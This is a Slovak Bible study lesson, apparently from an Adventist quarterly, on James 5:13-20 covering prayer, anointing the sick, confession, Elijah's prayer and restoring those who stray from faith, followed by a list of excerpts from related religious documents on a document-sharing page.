12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájo

Veľkosť: px
Začať zobrazovať zo stránky:

Download "12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájo"

Prepis

1 12 Týždeň od 13. do 19. decembra 82 Modlitba, uzdravenie a obnova Te x t y na tento t ý ždeň: Jak 5,13 20 Z á kl a dný verš Vyznávajte si teda navzájom hriechy a modlite sa jeden za druhého, aby ste boli uzdravení. Veľa zmôže účinná modlitba spravodlivého. (Jak 5,16) Ľudí priťahujú zázraky a nevysvetliteľné veci. Veľmi často je motívom ich záujmu zvedavosť alebo túžba po zábave. Ježiš robil zázraky, ale odmietal ich robiť vtedy, keď by nimi mal niekoho pobaviť (Luk 23,8.9), dokázať svoje mesiášstvo (Mat 12,38 41), alebo dokonca uspokojiť vlastné potreby (Mat 4,2 4). Duch, ktorým Ježiš vzbudzoval autoritu, učil a konal zázraky uzdravenia, nie je akousi mocou, ktorú je možné využívať namiesto toho sa máme stať nástrojmi v jeho rukách. Boh je schopný uzdraviť fyzicky chorých. Ide mu však o úplne iný typ uzdravenia ide mu o uzdravenie trvalé, večné. V súvislosti s tým sa v tejto lekcii pozrieme na niektoré zásadné otázky: Ako by sme mali chápať Jakubov text o uzdravovaní chorých? Aký je vzťah medzi uzdravením, odpustením a modlitbou? Čo je to účinná modlitba spravodlivého? Ako vyzerá ozajstné uctievanie Hospodina?

2 83 Nedeľa 14. decembra 12 Modlitba a spev Trpí niekto medzi vami? Nech sa modlí! Raduje sa niekto? Nech spieva žalmy! (Jak 5,13) Pri čítaní textu Jak 5,13 si môžeme uvedomiť určité napätie. Apoštol postavil vedľa seba utrpenie a radosť, modlitbu a spev: modli sa v utrpení a spievaj, keď máš radosť. Modlitba a spev sa od seba nemusia až tak líšiť, najmä keď si uvedomíme, že mnoho biblických žalmov je zároveň modlitbou. Jakub navyše na začiatku svojho listu svojich čitateľov vyzýva, aby mali radosť, keď na nich prídu rozličné skúšky, pretože ak sa vaša viera osvedčí, vedie to k vytrvalosti (Jak 1,2.3). Čas na modlitbu a chválospevy sa môže prelínať viac, než si myslíme. Slovo trpieť v Jak 5,13 vychádza z rovnakého základu ako slovo, ktoré Jakub použil pre utrpenie prorokov (Jak 5,10). Odkazuje nielen na fyzické a duševné utrpenie (najmä v súvislosti s vojnou), ale tiež na vyčerpávajúcu prácu a veľké úsilie. Nájdeme ho aj v 2Tim 2,9 a 4,5, kde opisuje ťažkú prácu apoštolov, ktorých neodradia žiadne ťažkosti ani utrpenie (Lexicon of the New Testament 2/240). Keď prídu do nášho života problémy, ako kresťania sa spontánne obraciame k Bohu. Modlitba môže mať rôzne podoby. Okrem hovorenej modlitby (tradičná modlitba, ako ju používame najčastejšie) sa môžeme modliť aj spievaním či hraním hudby (grécke slovo psalló z verša 5,13 znamená nielen spievať, ale aj hrať na hudobný nástroj). Ako súčasť bohoslužieb je spev prejavom uctievania, práve tak ako modlitba. Mnohé piesne sú vlastne modlitbami. (ED 168, VÝCH 145) Mnohým z nás pomohli v skľúčenosti a osamelosti práve slová piesne či melódia, ktorú sme si vypočuli alebo nám prišla na myseľ. Medzi nami je veľa strápených ľudí, ktorí potrebujú povzbudenie a útechu. Môžeme im ju priniesť napríklad aj v podobe návštevy, ktorá bude vyplnená modlitbami a piesňami. Apoštol Pavol píše: Radujte sa s radujúcimi a plačte s plačúcimi. (Rim 12,15) Kniha Žalmov je klenotnicou modlitieb a piesní, z ktorých môžeme čerpať inšpiráciu, povzbudenie a nasmerovanie, keď nevieme, kam sa obrátiť o pomoc. Všetci vieme, ako nás utrpenie môže viesť bližšie k Bohu a k modlitbe. Mnohí ľudia však prechádzajú takým súžením a bolesťou, že ich to od Boha skôr vzďaľuje. Ako im môžeme pomôcť? Aké duchovné nebezpečenstvo prichádza v čase, keď sa nám všetko darí? Prečo je práve v týchto chvíľach modlitba dôležitá? (Pozri Prísl 30,7 9.)

3 12 Pondelok 15. decembra Modlitba za chorých 84 Je niekto medzi vami chorý? Nech si zavolá starších cirkvi a nech sa nad ním modlia, keď ho v Pánovom mene pomažú olejom. A modlitba viery zachráni chorého a Pán ho pozdvihne. A ak sa dopustil hriechov, odpustia sa mu. (Jak 5,14.15) Ktoré nevyhnutné kroky uvádza Jakub pri pomazaní chorých? Aké hlavné duchovné princípy obsahuje text Jak 5,14.15? Skutočnosť, že chorí členovia žiadajú vedúcich zboru, aby ich prišli pomazať olejom v Pánovom mene, vyjadruje nielen ich túžbu, ale aj presvedčenie celého spoločenstva, že na uzdravenie je nevyhnutný Boží zásah (Mar 6,13). Zmienka o odpustení hriechov poukazuje na to, že Boh na základe nejakého rituálu neobnoví fyzické zdravie človeka, ak ten netúži aj po duchovnom uzdravení. Tým, ktorí si želajú, aby sme sa modlili za ich uzdravenie, by sme mali vysvetliť, že prestúpenie Božieho zákona, či už prírodného, alebo duchovného, je hriech. Ak chcú okúsiť Božie požehnanie, musia svoj hriech vyznať a opustiť. (MH 228; CKŽH 161) Text v Jak 5,14.15 o volaní po Božom zásahu a pozvanie starších naznačuje, že choroba už pravdepodobne človeka pripútala na lôžko alebo je natoľko naliehavá, že potrebuje rýchle riešenie. Výraz chorý je v gréčtine vyjadrený dvoma rôznymi slovesami. Prvé astheneó (v. 14) je použité aj v prípade Dorkas, ktorá ochorela a zomrela (Sk 9,37). Druhé kamnó (v. 15) sa všeobecne vzťahuje nielen na pacientov, ale aj na tých, ktorí práve zomierajú. Zázračné uzdravenie sa môže udiať ako odpoveď na modlitbu viery, ktorá predpokladá podriadenie sa Božej vôli, nech je akákoľvek (1Ján 5,14). Záchrana a pozdvihnutie chorého (podobne ako zachráni... od smrti /5,20/) ukazuje na vzkriesenie ako na jediné úplné uzdravenie, keď si toto porušiteľné oblečie neporušiteľnosť a toto smrteľné si oblečie nesmrteľnosť (1Kor 15,54). Mnoho ľudí vie o situácii alebo boli účastníkmi pomazania, keď sa chorý neuzdravil, ale zomrel. V čom sú verše nádeje na vzkriesenie našou jedinou istotou?

4 85 Utorok 16. decembra 12 Uzdravenie duše Vyznávajte si teda navzájom hriechy a modlite sa jeden za druhého, aby ste boli uzdravení. Veľa zmôže účinná modlitba spravodlivého. (Jak 5,16) Oveľa dôležitejšie než uzdravenie tela je uzdravenie duše. Posolstvo evanjelia nespočíva v tom, aby sa z ľudí stali zdravší hriešnici, ale aby pochopili zasľúbenie o večnom živote, ktorý môžeme mať prostredníctvom Ježiša Krista. Verš 16 rozširuje a dopĺňa predchádzajúcu pasáž o modlitbe za chorých (Jak 5,14.15). Slovo uzdravenie (iaomai) znamená viac než len telesné uzdravenie odkazuje aj na duchovné uzdravenie (pozri napríklad Mat 13,15). Ako už bolo povedané, vo verši 15 ide o uzdravenie v širšom zmysle slova (vzkriesenie). Jakub prepája chorobu s hriechom. Nie v tom zmysle, že za chorobou je vždy nejaký konkrétny hriech človeka, ale v zmysle, že choroba a smrť sú dôsledkom hriechu a týkajú sa celého ľudstva, ktoré padlo. Aký druh uzdravenia opisujú texty v Mar 2,1 12; Žid 12,12.13 a 1Pet 2,24.25? Aké podmienky na uzdravenie tu nachádzaš? Viera v Ježiša Krista prináša uzdravenie od duchovnej slabosti a od hriechu. Zmyslom každého Kristovho uzdravenia je zameranie pozornosti ľudí na ich potrebu záchrany v hlbšom zmysle. V prípade ochrnutého človeka v Markovom evanjeliu v 2. kapitole Ježiš rozpoznal, že prioritou je duchovné uzdravenie tohto človeka, preto ho na prvom mieste uisťuje o odpustení hriechov. Tento ochrnutý bol celkom bezmocný a vo svojom beznádejnom stave upadal do zúfalstva.... Nešlo mu už natoľko o telesné uzdravenie, ako o uľahčenie bremena hriechu. Keby mohol vidieť Ježiša a získať istotu odpustenia a zmierenia s nebom, bol by spokojný, nech by už podľa Božej vôle mal žiť, alebo zomrieť. (DA 267; TV 178) Je úplne v poriadku, keď sa lekári či fyzioterapeuti snažia využiť všetky dostupné liečebné prostriedky na vyliečenie z choroby. Tí z nich, ktorí vnímajú svoju službu ako Božie povolanie, by sa mali usilovať o uzdravenie celého človeka nielen pre tento život, ale aj s víziou večnosti. Uzdravenie zahŕňa v sebe aj uzdravenie vzťahov. Práve preto nás Jakub vyzýva, aby sme si navzájom vyznávali hriechy (Jak 5,16, porovnaj s Mat 18, ). Ak si teda niekomu ublížil alebo si ho urazil, vyznaj mu to a popros ho o odpustenie. Takto na nás spočinie Božie požehnanie proces vyznania totiž v sebe zahŕňa zomretie nášho ja, čo vytvára priestor na to, aby nás Kristus mohol formovať na svoj obraz. Premýšľaj o tom, či si niekomu v poslednom čase nejako ublížil. Ako si túto situáciu riešil? Ak si sa ospravedlnil a vyznal svoju chybu, aký vplyv to na teba malo? Ak si to neurobil, aké to malo dôsledky? Aké miesto má v tomto procese modlitba?

5 12 Streda 17. decembra Naliehavá modlitba 86 Eliáš bol človek ako my, ale keď sa horlivo modlil, aby nepršalo, nepršalo na zemi tri roky a šesť mesiacov. A znova sa modlil a nebo dalo dážď a zem vydala svoju úrodu. (Jak 5,17.18) Ako je Eliášova modlitba podľa Jak 5,17.18 prepojená s uzdravením, odpustením a obnovou? Tieto verše potvrdzujú uistenie z Jak 5,16: Mnoho zmôže v účinkoch modlitba spravodlivého. (RKC) Eliáš bol spravodlivý, dokonca bol vzatý do neba, a napriek tomu nebol žiadny nadčlovek. Podobne ako my, aj on prežíval strach či hnev. Skutočnosť, že Boh vypočul jeho modlitby, môže byť pre nás povzbudením. Jakub píše, že Eliáš sa horlivo modlil, aby nepršalo (detail, ktorý nie je zaznamenaný v starozmluvnom texte 1Kráľ 17 18) a dovolával sa pri tom zasľúbenia, ktoré odkazuje na 5Moj 11,13 17 (o čom sa zmieňuje Jakub vo verši 5,18). Podľa zmluvy zaznamenanej v 5Moj 11 nemohlo zostať bez odozvy, keď Izraeliti uctievali Baála (hlavné božstvo Kanaánu, okrem iného boh úrody a dažďa). Aj keď nevieme, ako dlho sa Eliáš modlil predtým, než boli vypočuté jeho modlitby, jeho modlitby boli založené na poznaní Božieho slova a jeho aplikácii na aktuálne okolnosti. Súčasťou jeho modlitieb mohlo byť dovolávanie sa Božích zasľúbení, podobne ako sa Danielove modlitby v babylonskom zajatí odvolávali na Jeremiášovo proroctvo (Dan 9,2.3). Aj naše modlitby by sa mali opierať o správne pochopenie okolností, v ktorých sa nachádzame, vo svetle Božieho slova. Obdobie bez dažďa trvalo tri a pol roka (Jak 5,17; pozri aj Luk 4,25). Rovnako dlhý čas je uvedený aj v prorockej poltýždňovej dobe tri a polročného obdobia Ježišovho pôsobenia (Dan 9,27) a čas a časy a polovicu času kresťanského odpadnutia spomínaného v Dan 7,25 a Zj 12,14. Na konci tohto obdobia Boh použil Eliáša na začatie diela oživenia a reformácie, ktorého výsledkom bolo prebudenie Izraela ľudia spoznali hĺbku svojho odpadnutia. Typovo ide o rovnaké poslanie, aké konal Ján Krstiteľ v 1. storočí, keď pripravoval cestu pre Kristov prvý príchod, a aké koná dnešná cirkev ostatku, ktorú Boh poveril prípravou sveta na druhý príchod (Mal 3,23.24 /Mal 4,5.6 Roh/ a Mat 11,13.14). Ako cirkev očakávame oživenie a reformáciu. Tie sa však musia začať v našich životoch, v nás samotných. Aký je smer a cieľ tvojho života? Aké zmeny potrebuješ vo svojom živote urobiť, aby si mohol úplne spolupracovať s Bohom na diele záchrany, ku ktorému ťa povoláva?

6 87 Štvrtok 18. decembra 12 Obnova a odpustenie Bratia moji, keď niekto z vás zblúdi od pravdy a ak ho potom niekto obráti, nech vie, že kto vráti hriešnika z jeho bludnej cesty, zachráni jeho dušu od smrti a zakryje množstvo hriechov. (Jak 5,19.20) Boží Duch prostredníctvom Eliáša obnovoval vzťah Izraela s Bohom. Väčšina Eliášovej činnosti sa však neodohrávala na vrchu Karmel. To bol iba začiatok! Táto obnova pokračovala v malých dedinkách, v domoch či pri výchove budúcich duchovných vodcov v prorockých školách, ktorí mali v tomto oživení pokračovať. Ako texty Jak 5,19.20; Luk 1,16.17 a Sk 3,19 opisujú činnosť Eliáša, Jána Krstiteľa a ďalších? Často zabúdame na Eliášovu každodennú láskavú a trpezlivú prácu. Aj Ján Krstiteľ sa sústredil na to, aby viedol ľudí späť k pravde inšpiroval ich k pokániu a ku krstu. Aj Ježiš opísal svoju prácu podobnými slovami: viedol ľudí od chýb a odpadnutia späť k pravde (Ján 8,43 45). Text v Jak 5,19.20 je v gréčtine vyjadrený podmieňovacím spôsobom. To naznačuje, že odpadnutie od viery nie je isté, ale dá sa predpokladať. Odchod od pravdy znamená nielen odpadnutie od vierouky, ale tiež zmenu životného štýlu veď tieto dve oblasti spolu úzko súvisia. Pochybnosti sa odrazia najprv vo vzťahu k vierouke a neskôr vedú k pokryteckému správaniu, ktoré vyústi do odpadnutia. Privedením človeka späť k viere bude zachránená jeho duša od smrti (Jak 5,20). Jakub vlastne nalieha na spoluveriacich, aby pokračovaním v Eliášovom diele privádzali ľudí späť k Bohu. Toto dielo si vyžaduje veľa trpezlivosti, empatie, citlivosti a pokory: Bratia, keby aj niekoho pristihli pri nejakom poklesku, vy, čo ste vedení Duchom, napravte ho v duchu miernosti a každý daj si pozor sám na seba, aby si i ty nepadol do pokušenia. (Gal 6,1) Princíp tejto práce, ktorú nám predstavil Eliáš, spočíva v privádzaní ľudských sŕdc k Bohu a jeho ľudu, nie v ich odvádzaní. Človek si je často dobre vedomý svojich hriechov a nepotrebuje, aby mu na ne niekto neustále poukazoval. O to viac potrebuje odpustenie, aké nám predstavil a svojou smrťou zabezpečil Ježiš. Spomeň si na niekoho, kto urobil niečo zlé a uvedomuje si to. Čo pre neho môžeš urobiť alebo čo mu môžeš povedať, aby si mu pomohol vrátiť sa k Bohu?

7 12 Piatok 19. decembra Podnety na zamyslenie 88 Kristus spojil svoje záujmy so záujmami ľudstva a žiada nás, aby sme v diele spásy boli jedno s ním. Hovorí: Zadarmo ste dostali, zadarmo dávajte (Mat 10,8). Hriech je najväčšie zlo a je našou povinnosťou hriešnikom súcitne pomáhať. Mnohí blúdia a uvedomujú si svoju hanbu a nerozvážnosť. Túžia po slovách povzbudenia. Premýšľanie o vlastnom poblúdení a omyloch ich privádza takmer do zúfalstva. K týmto ľuďom nemáme byť ľahostajní. Ako kresťania nesmieme prejsť na druhú stranu, aby sme boli čo najďalej od tých, ktorí potrebujú našu pomoc. Ak vidíme trpiacich, či už ranených telesne, alebo hriechom, nikdy nesmieme povedať: To sa ma netýka....slovami viery a povzbudenia prinášajte balzam sklesnutému a ranenému. (DA 504; TV 351) N á met y na sp oločné u va ž ova nie 1. Premýšľajte o tých obdobiach vo vašom živote, keď ste boli ďaleko od Boha a pôsobili ste bolesť sebe, druhým a svojimi hriechmi aj Bohu. Čo pre vás znamenala podpora a pomoc ľudí, ktorí pri vás stáli, aj keď nemuseli nevyhnutne súhlasiť s vaším konaním? Čo si z tohto obdobia pamätáte najviac? Ako vám môžu tieto spomienky pomôcť byť pre iných ľudí človekom povzbudenia, pomoci a potešenia? 2. Prečítajte si pozorne a s modlitbou text Jak 5,16. Aké dôležité duchovné ponaučenie nachádzate v tomto verši? Čo nám to hovorí o moci modlitby a jej dôležitosti pre náš duchovný život? Porozprávajte sa spoločne o tom, čo znamená pre vás modlitba, ako vnímate odpovede na modlitbu a ako ste sa naučili dôverovať Bohu aj v prípadoch, keď vaše modlitby neboli vypočuté tak, ako ste si to predstavovali. Západ slnka: 15.49

Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to,

Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to, Predslov Štýl tohto výkladu sa možno mnohým bude zdať zvláštny; bude sa im zdať príliš prísny na to, aby mohol byť formačný, a príliš formačný na to, aby mohol byť prísne vedecký. Na to druhé nemám nijaký

Podrobnejšie

Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej s

Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej s Ježišu, dôverujem ti! Nedeľa Božieho milosrdenstva 3. apríla 2016 HODINA MILOSRDENSTVA (pre 3 čítajúcich) 14:55 hod. Vyloženie Najsvätejšej oltárnej sviatosti Kňaz (3x): Ó, krv a voda, ktorá si vyšla z

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint STVORENIE SVETA (Gn 1, 1-27) Úvod do knihy Genezis gr. význam pôvod, vznik Opisuje začiatky Božieho stvoriteľského diela a dejín spásy. Opisuje počiatok stvorenia, počiatok ľudstva, počiatok soboty, manželstva,

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Odpovedz na otázky Ježišov príchod do ktorého mesta sa spomína v 2. kapitole Evanjelia sv Marka? A/ Kafarnaum B/ Jeruzalem C/ Nazaret Farizeji vyčítali Ježišovi,

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint KTO SPOZNÁVA BIBLIU SPOZNÁVA KRISTA. Biblia je súbor kníh, ktoré hovoria o zmluve, ktorú Boh uzavrel s Izraelom skrze Mojžiša a ktorú naplnil v Kristovi. Je to Bohom vnuknuté slovo. Nie diktát. Nespadla

Podrobnejšie

8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Zákl

8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Zákl 8 Týždeň od 18. do 24. februára 54 Svätý Duch a duchovné dary Texty na tento týždeň 1Kor 12,4 7.11; Ef 4,7; 1Kor 12,14 31; Rim 12,3 8; 1Ján 4,1 3 Základný text 4 Preto sú dary milosti rôzne, ale Duch je

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint Biblická súťaž Bratislavskej arcidiecézy 1. Odpovedz na otázky Ježišov príchod do ktorého mesta sa spomína v 2. kapitole Evanjelia sv Marka? A/ Kafarnaum B/ Jeruzalem C/ Nazaret A; Mk 2, 1 Farizeji vyčítali

Podrobnejšie

Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ak

Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ak Zdravé sebavedomie odzrkadľuje spôsob, akým vidíme sami seba. Ak sa chceme stať sebavedomejšími ľuďmi, musíme zmeniť to, čo si myslíme sami o sebe, ako sa vidíme a vnímame. S týmto obrazom budeme pracovať

Podrobnejšie

Micheas.doc

Micheas.doc MICHEÁŚ Mich 6,8: Hospodin ti oznámil človeče, čo je dobré a čo žiada od teba; len zachovať právo, milovať láskavosť a v pokore chodiť so svojim Bohom. Prorok Micheáš bol súčasník proroka Izaiaša. Obidvaja

Podrobnejšie

Pracovný list č

Pracovný list č Meno Priezvisko Pracovný list č. 11 Zmluva s Bohom farnosť Milý priateľ/ka! Tak sa pomaly blížime k záveru našej cesty. Mnohé sme za ten čas spoznali. A mnohé aj urobili. V Tvojom živote nastali zmeny:

Podrobnejšie

A4_01_OBR_SK_HL_CZ_KCZ_KSK_DSK_HOT.qxd

A4_01_OBR_SK_HL_CZ_KCZ_KSK_DSK_HOT.qxd Oslepený KĽÚČE LEKCIA 1. úloha Čítaj Prečítaj si príbeh Oslepený. Nauč sa Začni sa učiť kľúčový verš. Premýšľaj Porozmýšľaj o tom, čo ti ide naozaj dobre; o dare, ktorým ťa Boh obdaroval. Modli sa Popros

Podrobnejšie

Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: prihlasovanie sa na

Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: prihlasovanie sa na Letné aktivity 2019 Motto letných aktivít : Čo môžem urobiť ja, aby som pretváral svet okolo seba? Júl 2019 Prvý týždeň: 1.7.2019 prihlasovanie sa na jednotlivé aktivity CSPR, predstavenie aktivít priestor

Podrobnejšie

Microsoft Word - Document4

Microsoft Word - Document4 Hľadať poznanie o Nebeskom Otcovi a Jeho Synovi Ježišovi Kristovi Starší Robert D. Hales Kvórum dvanástich apoštolov Svetlo viery je vo vás a čaká, kým bude prebudené a zintenzívnené Duchom Božím. Moji

Podrobnejšie

Uzdravovanie chorých Starší Dallin H. Oaks Kvórum dvanástich apoštolov Máme túto kňazskú moc a mali by sme byť všetci pripravení ju vhodne používať. V

Uzdravovanie chorých Starší Dallin H. Oaks Kvórum dvanástich apoštolov Máme túto kňazskú moc a mali by sme byť všetci pripravení ju vhodne používať. V Uzdravovanie chorých Starší Dallin H. Oaks Kvórum dvanástich apoštolov Máme túto kňazskú moc a mali by sme byť všetci pripravení ju vhodne používať. V týchto nepokojných časoch po celom svete stále viac

Podrobnejšie

Prezentácia programu PowerPoint

Prezentácia programu PowerPoint BIBLIA Stará kniha a vždy nové Božie slovo KTO NEPOZNÁ BIBLIU NEPOZNÁ KRISTA (Sv. Hieronym) z gréčtiny a znamená KNIHA, KNIŽOČKY, SPISKY; ale aj BIBLIOTÉKA zoznam viac ako 40 kníh Starého zákona; Sväté

Podrobnejšie

Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, Bratislava IEA

Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, Bratislava IEA Identifikačný štítok TIMSS & PIRLS 2011 Dotazník pre žiaka 4. ročník Národný ústav certifikovaných meraní vzdelávania Pluhová 8, 831 03 Bratislava IEA, 2011 Moderné vzdelávanie pre vedomostnú spoločnosť/

Podrobnejšie

zvesti-apríl2015

zvesti-apríl2015 Bojnické zvesti ročník 41 Apríl Apríl 2015 2015 PRÍHOVOR PRIMÁTORA Vážení spoluobčania, v dnešnej uponáhľanej dobe si už ani neuvedomujeme, ako čas ubieha neúprosne rýchlo. Nestačíme vnímať ako sa nám

Podrobnejšie

Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín,

Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín, Poďakovanie za 13. slovenskú púť do Lúrd Mnohí ľudia cestujú za hranice svojej vlasti, aby spoznávali prírodnú krásu, históriu a kultúru iných krajín, aby strávili dovolenku v príjemnom prostredí a načerpali

Podrobnejšie

BULLETIN Jún

BULLETIN Jún BULLETIN Jún HOSPODIN JE MÔJ PASTIER Žalmy sú úžasnou časťou Biblie. Sú to básne, piesne, chvály, modlitby, múdrosti a vyznania. Asi žiadna iná z biblických kníh neodpovedá na toľko otázok každodenného

Podrobnejšie

C:/Users/benny/Desktop/2018_01/2018_01.sla

C:/Users/benny/Desktop/2018_01/2018_01.sla Michael Úvodník KALENDÁR UDALOSTÍ 2018 FARNOSŤ SKALICA Streda 14. február: Popolcová streda začiatok Pôstneho obdobia Sobota 3. marec: Pôstna duchovná obnova s Br. Mgr. Richardom Mariánom Jombíkom

Podrobnejšie

Microsoft Word - UO iŠkVP primárne vzdelávanie NBV kat.

Microsoft Word - UO iŠkVP primárne vzdelávanie NBV kat. Názov predmetu Vzdelávacia oblasť Názov ŠkVP Škola Stupeň vzdelania Forma štúdia Dĺžka vzdelávania Vyučovací jazyk Náboženská výchova - katolícka Človek a hodnoty Inovovaný školský vzdelávací program Základná

Podrobnejšie

SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť s

SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť s SPRAVODAJCA SLOVENSKÉHO ZDRUŽENIA CIRKVI ADVENTISTOV S.D. d e c e m b e r 2 0 1 2 O d k i a ľ kam? Hagar...! Odkiaľ prichádzaš a kam ideš?... Navráť sa ku svojej panej... 1Moj 16,8.9; Sú ľudia, ktorí si

Podrobnejšie

Zastupujeme ľudí s mentálnym postihnutím a ich príbuzných ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusi

Zastupujeme ľudí s mentálnym postihnutím a ich príbuzných ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusi ĽUDIA S MENTÁLNYM POSTIHNUTÍM A ICH PRÍBUZNÍ: VYUŽIME EURÓPSKE VOĽBY 2019 NA MAXIMUM Inclusion Europe pripravila tento dokument, aby sme čo najviac pochopili a využili príležitosti, ktoré nám ponúkajú

Podrobnejšie

1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí

1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí 1,4 milióna hladujúcich detí 1,4 milióna príbehov Aj vďaka Vašej podpore to môžu byť príbehy so šťastným koncom Priniesol som ho do nemocnice v náručí - Pierre a jeho uzdravenie z podvýživy UNICEF/UN0239556/Gilbertson

Podrobnejšie

Microsoft Word - Document4

Microsoft Word - Document4 Čiňte pokánie - aby som vás mohol uzdraviť Starší Neil L. Andersen Kvórum dvanástich apoštolov Výzva k pokániu je málokedy hlasom napomenutia, je to skôr milujúce naliehanie otočiť sa a znova sa obrátiť

Podrobnejšie

Microsoft Word - prakticka teologia_seminarka

Microsoft Word - prakticka teologia_seminarka TRNAVSKÁ UNIVERZITA TEOLOGICKÁ FAKULTA Študijný odbor: Sociálna práca a katolícka teológia Bakalársky študijný program formácia a vedenie spoločenstiev Praktická teológia Hnutie Modlitby matiek Vyučujúci:

Podrobnejšie

Pokračujte v trpezlivosti Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Lekcie, ktoré sa naučíme z trpezlivosti, budú kultivovať našu

Pokračujte v trpezlivosti Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Lekcie, ktoré sa naučíme z trpezlivosti, budú kultivovať našu Pokračujte v trpezlivosti Prezident Dieter F. Uchtdorf Druhý radca v Prvom predsedníctve Lekcie, ktoré sa naučíme z trpezlivosti, budú kultivovať našu povahu, pozdvihnú naše životy a zintenzívnia naše

Podrobnejšie

Úvod do Veľkej výpravy Svetlo na cestu Žalm 119:9-16,105 Začíname dobrodružstvo... Svetlo na cestu je úvodná lekcia na začiatok Veľkej výpravy. Čítaj

Úvod do Veľkej výpravy Svetlo na cestu Žalm 119:9-16,105 Začíname dobrodružstvo... Svetlo na cestu je úvodná lekcia na začiatok Veľkej výpravy. Čítaj Úvod do Veľkej výpravy Svetlo na cestu Žalm 119:9-16,105 Začíname dobrodružstvo... Svetlo na cestu je úvodná lekcia na začiatok Veľkej výpravy. Čítaj Čas: 5 min Cieľ: Naučme deti základné zručnosti ako

Podrobnejšie

Microsoft Word - bd7c-847f-df2b-6465

Microsoft Word - bd7c-847f-df2b-6465 Náboženská výchova 1. ročník Charakteristika vyučovacieho predmetu Keďže človek je z psychologického a sociologického hľadiska prirodzene bytosť náboženská, má potrebu smerovať k tomu, čo ho presahuje.

Podrobnejšie

89 13 Týždeň od 20. do 26. júna Ukrižovaný a vzkriesený Texty na tento týždeň: 1Moj 3,1 6; Luk 22, , 2Kor 13,8; Mat 12,30, 1Kor 15,14 Základný

89 13 Týždeň od 20. do 26. júna Ukrižovaný a vzkriesený Texty na tento týždeň: 1Moj 3,1 6; Luk 22, , 2Kor 13,8; Mat 12,30, 1Kor 15,14 Základný 89 13 Týždeň od 20. do 26. júna Ukrižovaný a vzkriesený Texty na tento týždeň: 1Moj 3,1 6; Luk 22,39 46.53, 2Kor 13,8; Mat 12,30, 1Kor 15,14 Základný verš Syna človeka musia vydať hriešnikom do rúk a ukrižovať

Podrobnejšie

Prítomnosť príbuzných postihnutého pri kardiopulmonálnej resuscitácii

Prítomnosť príbuzných postihnutého pri kardiopulmonálnej resuscitácii XXI. Kongres České společnosti anesteziologie, resuscitace a intenzivní medicíny Olomouc 2014 Jana Boroňová Trnavská univerzita v Trnave Auris media, s.r.o. Trnava ...neexistujú predpísané pravidlá pre

Podrobnejšie

F a r s k ý l i s t Gréckokatolícka cirkev, Farnosť Povýšenia sv. Kríža, Prešov-Sekčov Úvodník ročník X. Zdá sa mi, že život Cirkvi

